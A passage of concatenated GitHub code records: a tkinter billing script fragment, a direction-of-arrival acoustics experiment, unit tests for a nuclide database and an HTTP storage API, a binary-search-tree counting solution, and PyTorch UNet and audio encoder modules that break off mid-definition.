self.netAmnt.grid(row=2,column=0)\n\n\n\n\n\n\n\n\n\n\n\n\n\n self.frame1.pack()\n self.frame2.pack()\n self.frame3.pack()\n self.window.mainloop()\n\nobj=addtocart()\n\n\n\n# self.t=StringVar()\n#\n# self.total=Label(self.frame3,textvariable=self.t)\n# self.t.set(\"hi\")\n#\n#\n#\n# self.g=StringVar()\n# self.gst=Label(self.frame3,textvariable=self.g)\n# self.g.set(\"hey\")\n#\n#\n#\n#\n# self.n=StringVar()\n# self.netamount=Label(self.frame3,textvariable=self.n)\n# self.n.set(\"hello\")\n#\n#\n#\n#\n#\n#\n#\n# self.gst=Label(self.frame3,text=\"GST\")\n#\n#\n# self.netamount=Label(self.frame3,text=\"NET AMOUNT\")\n","repo_name":"KangNavneet/RestaurantBilling","sub_path":"demoaddToCART.py","file_name":"demoaddToCART.py","file_ext":"py","file_size_in_byte":6342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5166355389","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Mar 28 08:40:07 2023\r\n\r\n@author: Takahiro 
Iwami\r\n\"\"\"\r\n\r\n#################################################################\r\n# Experiment A\r\n#################################################################\r\n\r\n#================================================================\r\n# Import modules\r\n#================================================================\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.patches as pat\r\nfrom cycler import cycler\r\nimport numpy as np\r\nfrom scipy.special import jn\r\nimport time\r\n\r\n#================================================================\r\n# Definition of Functions\r\n#================================================================\r\ndef get_primary_field(c, k_lim, t, phi_vec, r):\r\n inner_prod = np.matmul(phi_vec, r.T)\r\n p = np.zeros([r.shape[0]], dtype=np.float64)\r\n for i in range(phi_vec.shape[0]):\r\n p += (k_lim[1]/np.pi)*np.sinc(k_lim[1]*(inner_prod[i]-c*t)/np.pi) - (k_lim[0]/np.pi)*np.sinc(k_lim[0]*(inner_prod[i]-c*t)/np.pi)\r\n return p\r\n\r\ndef RK(dim, k_max, r, r_p):\r\n dis = np.linalg.norm(r - r_p, axis=-1)\r\n dis[dis==0] += 1e-15\r\n return (k_max/(2*np.pi*dis))**(dim/2) * jn(dim/2, k_max*dis)\r\n\r\ndef K(dim, k_max, r1, r2):\r\n r = np.transpose(np.tile(r1, (r2.shape[0],1,1)), axes=(1,0,2))\r\n r_p = np.tile(r2, (r1.shape[0],1,1))\r\n return RK(dim, k_max, r, r_p)\r\n\r\ndef get_matrix_for_arrival_power_estimation(k_max, vartheta_vec, r, dim):\r\n r = np.transpose(np.tile(r, (r.shape[0],1,1)), axes=(1,0,2))\r\n r_p = np.transpose(r, axes=(1,0,2))\r\n diff = r - r_p\r\n return (2*k_max/(2*np.pi)**dim)*np.sinc(k_max*np.matmul(diff,vartheta_vec.T)/np.pi)\r\n\r\ndef add_noise(p, SNR=30):\r\n noise = np.random.rand(p.size)-0.5\r\n gain = np.sum(np.abs(p))/(10**(SNR/20)*np.sum(np.abs(noise)))\r\n tmp = noise.reshape(p.shape)*gain\r\n return p+tmp\r\n#================================================================\r\n# Main routine\r\n#================================================================\r\n\r\nif __name__ == \"__main__\":\r\n color_cycle = cycler(\"color\", ['lightgray', 'darkgray', 'black', 'lightgray', 'darkgray', 'black'])\r\n ls_cycle = cycler(\"linestyle\", ['-', '-', '-', '-.', '-.', '-.'])\r\n ms_cycle = cycler(\"markersize\", np.ones(6)*8)\r\n plt.rc('axes', prop_cycle=(color_cycle + ls_cycle + ms_cycle))\r\n \r\n np.random.seed(10) # fix seed\r\n dim = 2\r\n rho = 1.293\r\n kappa = 142.0e3\r\n c = np.sqrt(kappa/rho)\r\n f_c = np.array([250,1000,2000])\r\n f_low = f_c / np.sqrt(2)\r\n f_high = f_c * np.sqrt(2)\r\n k_min = 2*np.pi*f_low / c\r\n k_max = 2*np.pi*f_high / c\r\n k_lim = np.array([k_min, k_max]).T\r\n sl = 0.6 # length of each side\r\n # for MUSIC\r\n win = \"hann\"\r\n T = 2**8\r\n W = T//2+1\r\n fs = 8000\r\n t = np.arange(T)/fs\r\n t -= np.mean(t)\r\n \r\n # observation points\r\n div = 50\r\n int_num = div**2\r\n width = 0.02\r\n x_o, y_o= (np.mgrid[0:div:1, 0:div:1]+0.5) * width\r\n x_o = x_o - width*(div/2)\r\n y_o = y_o - width*(div/2)\r\n r_o = np.concatenate((x_o.reshape(div**2,1), y_o.reshape(div**2,1)), axis=1)\r\n disp_lim = np.array([np.min(x_o), np.max(x_o), np.min(y_o), np.max(y_o)])\r\n \r\n # sensor placement\r\n U = 100\r\n r_u = (np.random.rand(U, 2) - 0.5)*sl\r\n \r\n # directions of sound sources\r\n phi_deg = np.array([40, 110, 150])\r\n phi = np.deg2rad(phi_deg)\r\n phi_vec = -np.array([np.cos(phi), np.sin(phi)]).T\r\n \r\n # preprocessing\r\n lam = 0.1\r\n vartheta_num = 400\r\n vartheta_deg = np.linspace(0, 180, num=vartheta_num)\r\n vartheta = np.deg2rad(vartheta_deg)\r\n 
vartheta_vec = np.concatenate((np.cos(vartheta).reshape(vartheta_num,1), np.sin(vartheta).reshape(vartheta_num,1)), axis=1)\r\n\r\n # drawing\r\n p_pri = get_primary_field(c, k_lim[0], 0, phi_vec, r_o).reshape(div,div)\r\n p_pri /= np.max(np.abs(p_pri))\r\n fig1, ax1 = plt.subplots()\r\n ax1.tick_params(labelsize=24)\r\n ax1.set_xticks([-0.4, 0, 0.4])\r\n ax1.set_yticks([-0.4, 0, 0.4])\r\n im1 = ax1.imshow(p_pri.T, cmap=plt.cm.seismic, vmin=-1, vmax=1, interpolation='bicubic', origin='lower', extent=disp_lim)\r\n ax1.scatter(r_u[:,0], r_u[:,1], s=10, lw=0.2, c=\"black\", edgecolor=\"white\")\r\n rec = pat.Rectangle(xy = (-sl/2, -sl/2), width=sl, height=sl, angle=0, ec=\"gray\", fill=False, ls=\"--\", lw=1)\r\n ax1.add_patch(rec)\r\n ax1.set_xlabel(\"x [m]\", fontsize=24)\r\n ax1.set_ylabel(\"y [m]\", fontsize=24)\r\n \r\n p_pri = get_primary_field(c, k_lim[2], 0, phi_vec, r_o).reshape(div,div)\r\n p_pri /= np.max(np.abs(p_pri))\r\n fig2, ax2 = plt.subplots()\r\n ax2.tick_params(labelbottom=False, labelleft=False, labelright=False, labeltop=False)\r\n ax2.tick_params(bottom=False, left=False, right=False, top=False)\r\n im2 = ax2.imshow(p_pri.T, cmap=plt.cm.seismic, vmin=-1, vmax=1, interpolation='bicubic', origin='lower', extent=disp_lim)\r\n cb2 = fig2.colorbar(im2, ticks=[-1.0, -0.5, 0, 0.5, 1.0])\r\n cb2.ax.tick_params(labelsize=24)\r\n cb2.set_label(\"Sound pressure [Pa]\", fontname=\"Arial\", fontsize=24) \r\n ax2.scatter(r_u[:,0], r_u[:,1], s=10, lw=0.2, c=\"black\", edgecolor=\"white\")\r\n rec = pat.Rectangle(xy = (-sl/2, -sl/2), width=sl, height=sl, angle=0, ec=\"gray\", fill=False, ls=\"--\", lw=1)\r\n ax2.add_patch(rec)\r\n \r\n fig3, ax3 = plt.subplots(figsize=(16,9))\r\n ax3.vlines(phi_deg, 0, 1.05, color=\"dimgrey\", linestyles='-', label=\"True DOAs\")\r\n ax3.set_ylim(0, 1.05)\r\n ax3.set_xticks([0, 40, 90, 110, 150, 180])\r\n ax3.tick_params(labelsize=20)\r\n ax3.set_xlabel(\"Angle [deg]\", fontsize=20)\r\n ax3.set_ylabel(\"Normalized value\", fontsize=20)\r\n ax3.grid(ls=\"--\")\r\n\r\n # proposed method\r\n for f in range(f_c.shape[0]):\r\n K_inv = np.linalg.inv(K(dim, k_max[f], r_u, r_u) + lam*np.eye(r_u.shape[0]))\r\n C = np.einsum(\"ijk,jl->ilk\", np.einsum(\"ij,jkl->ikl\", K_inv.T, get_matrix_for_arrival_power_estimation(k_max[f], vartheta_vec, r_u, dim)), K_inv)\r\n p = get_primary_field(c, k_lim[f], 0, phi_vec, r_u)\r\n p = add_noise(p, SNR=30) \r\n start = time.time()\r\n P_p = np.matmul(np.matmul(C.T, p), p) # proposed method\r\n print(\"Proposed method\", time.time() - start)\r\n P_p -= np.min(P_p)\r\n P_p /= np.max(P_p)\r\n ax3.plot(vartheta_deg, P_p, lw=2, markevery=5, label=\"Proposed ({} Hz)\".format(f_c[f]))\r\n \r\n # MUSIC algorithm\r\n p = np.empty([T, U], dtype=np.float64)\r\n window = np.hanning(T)\r\n for f in range(f_c.shape[0]):\r\n index_range = np.array([int(np.ceil(2*f_low[f]*W/fs)), int(np.floor(2*f_high[f]*W/fs))])\r\n index_num = index_range[1] - index_range[0]\r\n for i in range(T):\r\n p[i] = get_primary_field(c, k_lim[f], t[i], phi_vec, r_u)\r\n p[i] = add_noise(p[i], SNR=30)\r\n start = time.time()\r\n p = p * np.tile(window.reshape(-1,1), (1,U))\r\n P = np.fft.rfft(p, axis=0)\r\n beta = np.zeros([index_num], dtype=np.float64)\r\n P_MU = np.empty([index_num, vartheta_num], dtype=np.float64)\r\n Rxx = np.einsum(\"ijk,ikl->ijl\", P[index_range[0]:index_range[1]].reshape(index_num,U,1), np.conjugate(P[index_range[0]:index_range[1]]).reshape(index_num,1,U)) / index_num\r\n for w in range(index_num):\r\n k = 
2*np.pi*(fs*(w+index_range[0])/(2*W))/c\r\n u,s,v = np.linalg.svd(Rxx[w]) # singular value decomposition\r\n En = u[:,phi_deg.shape[0]:]\r\n beta[w] = np.sum(s[:phi.shape[0]])\r\n for i in range(vartheta_num):\r\n a = np.exp(1j*k*np.matmul(r_u, vartheta_vec[i]))\r\n P_MU[w,i] = np.real(np.matmul(np.conjugate(a), a)/(np.matmul(np.matmul(np.matmul(np.conjugate(a), En), np.conjugate(En.T)),a)))\r\n P_MU = np.sum(P_MU*np.tile(beta.reshape(-1,1), (1, vartheta_num)), axis=0)\r\n print(\"MUSIC\", time.time() - start)\r\n P_MU -= np.min(P_MU)\r\n P_MU /= np.max(P_MU)\r\n ax3.plot(vartheta_deg, P_MU, lw=2, markevery=5, label=\"MUSIC ({} Hz)\".format(f_c[f]))\r\n \r\n ax3.legend(loc='upper left', fontsize=15)\r\n \r\n plt.show()\r\n","repo_name":"Takahiro-Iwami/JASA2023_Half-Space_DOA","sub_path":"Experiment-A.py","file_name":"Experiment-A.py","file_ext":"py","file_size_in_byte":8185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26445543901","text":"import unittest\nimport actigamma as ag\n\n\n# Mock the database using a dummy loader\nclass MockLoader(object):\n def __enter__(self):\n \"\"\"\n Some dummy data\n \"\"\"\n return {\n \"H3\": {\n \"beta\": {\n \"lines\": {\n \"energies\": [18571.0, 45213.2],\n \"energies_unc\": [6.0, 5.0],\n \"intensities\": [1.0, 0.8],\n \"intensities_unc\": [0.0, 0.0],\n \"norms\": [1.0, 1.0],\n \"norms_unc\": [0.0, 0.0],\n },\n \"mean_energy\": 5707.4,\n \"mean_energy_unc\": 1.84397,\n \"mean_normalisation\": 1.0,\n \"mean_normalisation_unc\": 0.0,\n \"number\": 2,\n },\n \"gamma\": {\n \"lines\": {\n \"energies\": [3571.0],\n \"energies_unc\": [2.0],\n \"intensities\": [1.0],\n \"intensities_unc\": [0.0],\n \"norms\": [1.0],\n \"norms_unc\": [0.0],\n },\n \"mean_energy\": 307.4,\n \"mean_energy_unc\": 1.84397,\n \"mean_normalisation\": 1.0,\n \"mean_normalisation_unc\": 0.0,\n \"number\": 1,\n },\n \"SF\": {},\n \"halflife\": 389105000.0,\n \"zai\": 10030,\n },\n \"Li8\": {\n \"alpha\": {\n \"lines\": {\n \"energies\": [1566000.0],\n \"energies_unc\": [30000.0],\n \"intensities\": [1.0],\n \"intensities_unc\": [0.0],\n \"norms\": [1.0],\n \"norms_unc\": [0.0001],\n },\n \"mean_energy\": 3125250.0,\n \"mean_energy_unc\": 30000.4,\n \"mean_normalisation\": 1.0,\n \"mean_normalisation_unc\": 0.0001,\n \"number\": 1,\n },\n \"beta\": {\n \"lines\": {\n \"energies\": [28571.0],\n \"energies_unc\": [30000.0],\n \"intensities\": [1.0],\n \"intensities_unc\": [0.0],\n \"norms\": [1.0],\n \"norms_unc\": [0.0001],\n },\n \"mean_energy\": 6204620.0,\n \"mean_energy_unc\": 14446.8,\n \"mean_normalisation\": 1.0,\n \"mean_normalisation_unc\": 0.0001,\n \"number\": 1,\n },\n \"halflife\": 0.838,\n \"zai\": 30080,\n },\n }\n\n def __exit__(self, *args):\n \"\"\"\n Does nothing\n \"\"\"\n pass\n\n\nclass DatabaseInventoryUnitTest(unittest.TestCase):\n def setUp(self):\n self.db = ag.DefaultDatabase(datasource=MockLoader())\n\n def test_nuclides(self):\n self.assertEqual(\n [\"H3\", \"Li8\"], sorted(self.db.allnuclides), \"Assert all nuclides\"\n )\n self.assertEqual(\n [\"H3\"],\n self.db.allnuclidesoftype(spectype=\"gamma\"),\n \"Assert all nuclides of gamma type\",\n )\n self.assertEqual(\n [\"Li8\"],\n self.db.allnuclidesoftype(spectype=\"alpha\"),\n \"Assert all nuclides of alpha type\",\n )\n self.assertEqual(\n [\"H3\", \"Li8\"],\n sorted(self.db.allnuclidesoftype(spectype=\"beta\")),\n \"Assert all nuclides of beta type\",\n )\n self.assertEqual(True, \"H3\" in self.db, \"Assert H3 in database\")\n 
self.assertEqual(True, \"Li8\" in self.db, \"Assert Li8 in database\")\n self.assertEqual(False, \"h3\" in self.db, \"Assert h3 not in database\")\n self.assertEqual(False, \"h 3\" in self.db, \"Assert h 3 not in database\")\n self.assertEqual(False, \"U235\" in self.db, \"Assert U235 not in database\")\n\n def test_types(self):\n self.assertEqual(\n sorted([\"gamma\", \"alpha\", \"beta\", \"SF\"]),\n self.db.alltypes,\n \"Assert all types\",\n )\n self.assertEqual(\n sorted([\"gamma\", \"beta\", \"SF\"]), self.db.gettypes(\"H3\"), \"Assert all types\"\n )\n\n def test_zai(self):\n self.assertEqual(10030, self.db.getzai(\"H3\"), \"Assert ZAI H3\")\n self.assertEqual(30080, self.db.getzai(\"Li8\"), \"Assert ZAI Li8\")\n\n def test_name(self):\n self.assertEqual(\"H3\", self.db.getname(10030), \"Assert name H3\")\n self.assertEqual(\"Li8\", self.db.getname(30080), \"Assert name Li8\")\n\n def test_halflife(self):\n self.assertEqual(389105000.0, self.db.gethalflife(\"H3\"), \"Assert halflife H3\")\n self.assertEqual(0.838, self.db.gethalflife(\"Li8\"), \"Assert halflife Li8\")\n\n def test_linedata(self):\n self.assertEqual(\n [3571.0], self.db.getenergies(\"H3\").tolist(), \"Assert gamma energies H3\"\n )\n self.assertEqual(\n [1.0], self.db.getintensities(\"H3\").tolist(), \"Assert gamma intensities H3\"\n )\n self.assertEqual(\n [18571.0, 45213.2],\n self.db.getenergies(\"H3\", spectype=\"beta\").tolist(),\n \"Assert beta energies H3\",\n )\n self.assertEqual(\n [1.0, 0.8],\n self.db.getintensities(\"H3\", spectype=\"beta\").tolist(),\n \"Assert beta intensities H3\",\n )\n self.assertEqual(\n [28571],\n self.db.getenergies(\"Li8\", spectype=\"beta\").tolist(),\n \"Assert beta energies Li8\",\n )\n self.assertEqual(\n [1.0],\n self.db.getintensities(\"Li8\", spectype=\"beta\").tolist(),\n \"Assert beta intensities Li8\",\n )\n\n def test_sortedlines(self):\n alphas = ag.sortedlines(self.db, spectype=\"alpha\")\n betas = ag.sortedlines(self.db, spectype=\"beta\")\n gammas = ag.sortedlines(self.db, spectype=\"gamma\")\n nonsense = ag.sortedlines(self.db, spectype=\"dsad\")\n\n self.assertEqual(alphas, [(\"Li8\", 1566000.0)], \"Assert sorted alphas\")\n self.assertEqual(\n betas,\n [(\"H3\", 18571.0), (\"Li8\", 28571.0), (\"H3\", 45213.2)],\n \"Assert sorted betas\",\n )\n self.assertEqual(gammas, [(\"H3\", 3571.0)], \"Assert sorted gammas\")\n self.assertEqual(nonsense, [], \"Assert sorted nonsense\")\n\n def test_make_inventory_from_atoms(self):\n h3_atoms = 13452334\n li8_atoms = 9876543\n h3_activity = ag.atoms_from_activity(self.db, \"H3\", h3_atoms)\n li8_activity = ag.atoms_from_activity(self.db, \"Li8\", li8_atoms)\n\n inv = ag.make_inventory_from_atoms(\n self.db,\n {self.db.getzai(\"H3\"): h3_atoms, self.db.getzai(\"Li8\"): li8_atoms},\n )\n\n self.assertEqual(inv[0], (10030, h3_activity))\n self.assertEqual(inv[1], (30080, li8_activity))\n","repo_name":"fispact/actigamma","sub_path":"tests/databasetest.py","file_name":"databasetest.py","file_ext":"py","file_size_in_byte":7093,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"35592036335","text":"import asyncio\nimport json\nimport logging\nimport time\nimport shortuuid\nimport uvicorn\nimport pytest\nimport freezegun\nimport ariadne.asgi\nimport jwt\nfrom typing import Optional, List\nfrom multiprocessing import Process\nfrom gql import Client, gql\nfrom gql.transport.aiohttp import AIOHTTPTransport\n\nimport serializing\nimport config\nimport storage\nfrom loggers import 
get_logger\nfrom model import *\nimport schema as schema_factory\nimport test\n\nlog = get_logger(\"dimsum\")\nsession_key = \"asdfasdf\"\n\n\n@pytest.fixture(scope=\"function\")\ndef silence_aihttp(caplog):\n caplog.set_level(logging.CRITICAL, \"gql.transport.aiohttp\")\n yield\n\n\ndef session(url: str, key: str = \"jlewallen\"):\n global session_key\n jwt_token = jwt.encode(dict(key=key), session_key, algorithm=\"HS256\")\n return Client(\n transport=AIOHTTPTransport(\n url=url, headers={\"Authorization\": \"Bearer %s\" % (jwt_token,)}\n ),\n fetch_schema_from_transport=True,\n )\n\n\nasync def initialize(url: str):\n async with session(url) as s:\n query = gql(\"mutation { makeSample { affected { key } } }\")\n await s.execute(query)\n\n\ndef app():\n global session_key\n log.info(\"starting test server\")\n cfg = config.symmetrical(\":memory:\", session_key=session_key)\n schema = schema_factory.create()\n domain = cfg.make_domain()\n get_logger(\"ariadne.silenced\").setLevel(logging.CRITICAL)\n return ariadne.asgi.GraphQL(\n schema,\n context_value=schema_factory.context(cfg, domain),\n debug=True,\n logger=\"ariadne.silenced\",\n )\n\n\n@pytest.fixture(scope=\"session\")\ndef server():\n log.info(\"starting server\")\n proc = Process(\n target=uvicorn.run,\n args=(app,),\n kwargs={\n \"host\": \"127.0.0.1\",\n \"port\": 45600,\n \"log_level\": \"critical\",\n \"factory\": True,\n },\n daemon=True,\n )\n proc.start()\n time.sleep(0.5)\n\n asyncio.run(initialize(\"http://127.0.0.1:45600\"))\n # loop = asyncio.get_event_loop()\n # loop.run_until_complete()\n\n yield\n\n proc.kill()\n\n\ndef get_token(key: str, session_key=\"asdfasdf\"):\n return jwt.encode(dict(key=key), session_key, algorithm=\"HS256\")\n\n\n@pytest.mark.asyncio\nasync def test_storage_http_number_of_entities(server, silence_aihttp):\n store = storage.HttpStorage(\"http://127.0.0.1:45600\", get_token(\"jlewallen\"))\n size = await store.number_of_entities()\n assert size == 70\n\n\n@pytest.mark.asyncio\nasync def test_storage_load_by_key(server, silence_aihttp):\n store = storage.HttpStorage(\"http://127.0.0.1:45600\", get_token(\"jlewallen\"))\n serialized = await store.load_by_key(\"world\")\n assert [json.loads(s.serialized) for s in serialized]\n\n\n@pytest.mark.asyncio\nasync def test_storage_load_by_gid(server, silence_aihttp):\n store = storage.HttpStorage(\"http://127.0.0.1:45600\", get_token(\"jlewallen\"))\n serialized = await store.load_by_gid(0)\n assert [json.loads(s.serialized) for s in serialized]\n\n\n@pytest.mark.asyncio\nasync def test_storage_update_nothing(server, silence_aihttp):\n store = storage.HttpStorage(\"http://127.0.0.1:45600\", get_token(\"jlewallen\"))\n serialized = await store.update({})\n assert serialized == {}\n\n\n@pytest.fixture(scope=\"session\")\ndef deterministic():\n with test.Deterministic():\n yield\n\n\n@pytest.mark.asyncio\n@freezegun.freeze_time(\"2019-09-25\")\nasync def test_storage_update_one_entity(\n snapshot, server, silence_aihttp, deterministic\n):\n key = shortuuid.uuid(name=\"example-1\")\n e = Entity(key=key, creator=World(), props=Common(name=\"Fake Entity\"))\n serialized = serializing.serialize(e, identities=serializing.Identities.PRIVATE)\n assert serialized\n\n store = storage.HttpStorage(\"http://127.0.0.1:45600\", get_token(\"jlewallen\"))\n\n updated = await store.update({key: CompiledJson.compile(serialized)})\n snapshot.assert_match(test.pretty_json(updated, deterministic=True), \"before.json\")\n\n e.version.increase()\n serialized = 
serializing.serialize(e, identities=serializing.Identities.PRIVATE)\n assert serialized\n\n updated = await store.update({key: CompiledJson.compile(serialized)})\n snapshot.assert_match(test.pretty_json(updated, deterministic=True), \"after.json\")\n\n loaded: List[Serialized] = await store.load_by_key(key)\n snapshot.assert_match(\n test.pretty_json({v.key: v.serialized for v in loaded}, deterministic=True),\n \"queried.json\",\n )\n\n\n@pytest.mark.asyncio\n@freezegun.freeze_time(\"2019-09-25\")\nasync def test_storage_delete_one_entity(\n snapshot, server, silence_aihttp, deterministic, caplog\n):\n key = shortuuid.uuid(name=\"example-2\")\n e = Entity(key=key, creator=World(), props=Common(name=\"Fake Entity\"))\n serialized = serializing.serialize(e, identities=serializing.Identities.PRIVATE)\n assert serialized\n\n store = storage.HttpStorage(\"http://127.0.0.1:45600\", get_token(\"jlewallen\"))\n updated = await store.update({key: CompiledJson.compile(serialized)})\n snapshot.assert_match(test.pretty_json(updated, deterministic=True), \"before.json\")\n\n e.version.increase()\n e.destroy()\n serialized = serializing.serialize(e, identities=serializing.Identities.PRIVATE)\n assert serialized\n\n updated = await store.update({key: CompiledJson.compile(serialized)})\n snapshot.assert_match(test.pretty_json(updated, deterministic=True), \"after.json\")\n\n with pytest.raises(Exception) as ex:\n with caplog.at_level(logging.CRITICAL):\n await store.load_by_key(key)\n\n assert \"MissingEntityException\" in str(ex)\n","repo_name":"jlewallen/dimsum","sub_path":"src/dimsum/test_storage_http.py","file_name":"test_storage_http.py","file_ext":"py","file_size_in_byte":5584,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"12578047831","text":"# https://www.interviewbit.com/courses/programming/topics/dynamic-programming/problems/unique-binary-search-trees-ii/\n# \n\nclass Solution:\n # @param A : integer\n # @return an integer\n def numTrees(self, A):\n return self._numTrees(A, {})\n\n def _numTrees(self, num, memo):\n if num <= 1: return 1\n if num in memo: return memo[num]\n \n total = 0\n for n in xrange(1, num+1):\n leftWays = self._numTrees(n - 1, memo)\n rightWays = self._numTrees(num - n, memo)\n total += leftWays * rightWays\n \n memo[num] = total \n return total\n","repo_name":"diegomontoyas/Algorithms","sub_path":"InterviewBit/unique-binary-search-trees-ii.py","file_name":"unique-binary-search-trees-ii.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1183194454","text":"# TODO: Seperate the networks into different files\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n# from line_profiler_pycharm import profile\n\nACTIVATIONS = {\n 'relu': nn.ReLU,\n 'leaky_relu': nn.LeakyReLU,\n 'selu': nn.SELU,\n 'silu': nn.SiLU\n}\n\n\nclass WSLinear(nn.Module):\n def __init__(\n self, in_features, out_features\n ):\n super(WSLinear, self).__init__()\n self.linear = nn.Linear(in_features, out_features)\n self.scale = (2 / in_features) ** 0.5\n self.bias = self.linear.bias\n self.linear.bias = None\n\n nn.init.normal_(self.linear.weight)\n nn.init.zeros_(self.bias)\n\n # @profile\n def forward(self, x):\n return self.linear(x * self.scale) + self.bias\n\n\nclass AdaIN(nn.Module):\n\n def __init__(self, style_dim, n_feat):\n super(AdaIN, self).__init__()\n\n self.norm = nn.InstanceNorm2d(n_feat)\n self.mu = 
WSLinear(style_dim, n_feat)\n self.sigma = WSLinear(style_dim, n_feat)\n\n # @profile\n def forward(self, x, style):\n x = self.norm(x)\n mu = self.mu(style).unsqueeze(2).unsqueeze(3)\n sigma = self.sigma(style).unsqueeze(2).unsqueeze(3)\n\n #return (x * sigma) + mu\n return x\n\nclass BasicBlock(nn.Module):\n\n def __init__(self, in_c, out_c, h_c=None, activation='silu', use_norm=True):\n super(BasicBlock, self).__init__()\n if h_c is None:\n h_c = out_c\n\n self.conv1 = nn.Conv2d(in_c, h_c, kernel_size=3, padding=1, bias=True, padding_mode='reflect')\n self.act1 = ACTIVATIONS[activation]()\n\n self.conv2 = nn.Conv2d(h_c, out_c, kernel_size=3, padding=1, bias=True, padding_mode='reflect')\n self.act2 = ACTIVATIONS[activation]()\n\n if use_norm:\n self.norm1 = nn.InstanceNorm2d(h_c)\n self.norm2 = nn.InstanceNorm2d(out_c)\n else:\n self.norm1 = nn.Identity()\n self.norm2 = nn.Identity()\n\n # @profile\n def forward(self, x):\n\n x = self.conv1(x)\n x = self.act1(x)\n x = self.norm1(x)\n\n x = self.conv2(x)\n x = self.act2(x)\n x = self.norm2(x)\n\n return x\n\n\nclass ResBlock(nn.Module):\n\n def __init__(self, in_c, out_c, h_c=None, activation='silu', use_norm=True):\n super(ResBlock, self).__init__()\n if h_c is None:\n h_c = out_c\n\n self.conv1 = nn.Conv2d(in_c, h_c, kernel_size=3, padding=1, bias=True, padding_mode='reflect')\n self.act1 = ACTIVATIONS[activation]()\n\n self.conv2 = nn.Conv2d(h_c, out_c, kernel_size=3, padding=1, bias=True, padding_mode='reflect')\n self.act2 = ACTIVATIONS[activation]()\n\n if use_norm:\n self.norm1 = nn.InstanceNorm2d(h_c)\n self.norm2 = nn.InstanceNorm2d(out_c)\n else:\n self.norm1 = nn.Identity()\n self.norm2 = nn.Identity()\n\n # @profile\n def forward(self, x):\n\n x0 = self.conv1(x)\n x0 = self.act1(x0)\n x0 = self.norm1(x0)\n\n x1 = self.conv2(x0)\n x1 = self.act2(x1)\n x1 = self.norm2(x1)\n\n return x + x1\n\n\nclass DownBlock(nn.Module):\n\n def __init__(self, in_c, out_c, downscale=2):\n super(DownBlock, self).__init__()\n\n self.down = nn.Conv2d(in_c, in_c, kernel_size=3, padding=1, padding_mode='reflect', stride=downscale)\n self.norm = nn.InstanceNorm2d(in_c)\n self.net = BasicBlock(in_c, out_c)\n\n # @profile\n def forward(self, x):\n x = self.down(x)\n x = self.norm(x)\n return self.net(x)\n\n\nclass UpBlock(nn.Module):\n\n def __init__(self, in_c, out_c, downscale=2, use_norm=True):\n super(UpBlock, self).__init__()\n\n self.net = BasicBlock(in_c * 2, out_c, use_norm=use_norm)\n self.up = nn.UpsamplingBilinear2d(scale_factor=downscale)\n\n # @profile\n def forward(self, x, x_skip):\n x = torch.cat((x_skip, x), dim=1)\n x = self.net(x)\n return self.up(x)\n\n\nclass UnetAdaIN(nn.Module):\n\n def __init__(self, in_c, out_c, n_blocks=4, downscale=2, init_features=32, cond_c=256):\n super(UnetAdaIN, self).__init__()\n\n self.in_conv = nn.Conv2d(in_c, init_features, kernel_size=7, padding=3, padding_mode='reflect')\n downs = []\n n_feat = init_features\n for block in range(n_blocks):\n downs.append(DownBlock(n_feat, n_feat * 2, downscale=downscale))\n n_feat *= 2\n self.downs = nn.ModuleList(downs)\n\n self.bottleneck = nn.ModuleList([ResBlock(n_feat, n_feat), ResBlock(n_feat, n_feat), ResBlock(n_feat, n_feat)])\n\n ups, adas = [], []\n n_cond = n_feat\n for block in range(n_blocks):\n ups.append(UpBlock(n_feat, n_feat // 2, downscale=downscale, use_norm=False))\n adas.append(AdaIN(n_cond, n_feat // 2))\n n_feat = n_feat // 2\n\n self.ups = nn.ModuleList(ups)\n self.adas = nn.ModuleList(adas)\n\n self.final_block = BasicBlock(n_feat, 
n_feat)\n self.out_conv = nn.Conv2d(n_feat, out_c, kernel_size=1, padding=0)\n\n self.mapping = nn.Sequential(\n nn.Linear(cond_c, cond_c),\n nn.LeakyReLU(),\n\n nn.Linear(cond_c, cond_c),\n nn.LeakyReLU(),\n\n nn.Linear(cond_c, cond_c),\n nn.LeakyReLU()\n )\n\n # @profile\n def forward(self, x, x_ref):\n\n # x_ref = self.mapping(x_ref)\n\n x0 = self.in_conv(x)\n x_conds = [x0]\n x = x0\n\n for down in self.downs:\n x = down(x)\n x_conds.append(x)\n\n # for i, layer in enumerate(self.bottleneck):\n # x = layer(x)\n\n for i, up in enumerate(self.ups):\n x_skip = x_conds.pop(-1)\n x = up(x, x_skip)\n x = self.adas[i](x, x_ref.squeeze())\n\n x = self.final_block(x)\n # return torch.sigmoid(self.out_conv(x))\n return self.out_conv(x)\n\n\nclass Conv2d(nn.Module):\n def __init__(self, cin, cout, kernel_size, stride, padding, residual=False, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.conv_block = nn.Sequential(\n nn.Conv2d(cin, cout, kernel_size, stride, padding),\n nn.BatchNorm2d(cout)\n )\n self.act = nn.ReLU()\n self.residual = residual\n\n def forward(self, x):\n out = self.conv_block(x)\n if self.residual:\n out += x\n return self.act(out)\n\nclass AudioEncoder(nn.Module):\n\n def __init__(self):\n super(AudioEncoder, self).__init__()\n self.net = nn.Sequential(\n Conv2d(1, 32, kernel_size=3, stride=1, padding=1),\n Conv2d(32, 32, kernel_size=3, stride=1, padding=1, residual=True),\n Conv2d(32, 32, kernel_size=3, stride=1, padding=1, residual=True),\n\n Conv2d(32, 64, kernel_size=3, stride=(3, 1), padding=1),\n Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),\n Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),\n\n Conv2d(64, 128, kernel_size=3, stride=3, padding=1),\n Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),\n Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),\n\n Conv2d(128, 256, kernel_size=3, stride=(3, 2), padding=1),\n Conv2d(256, 256, 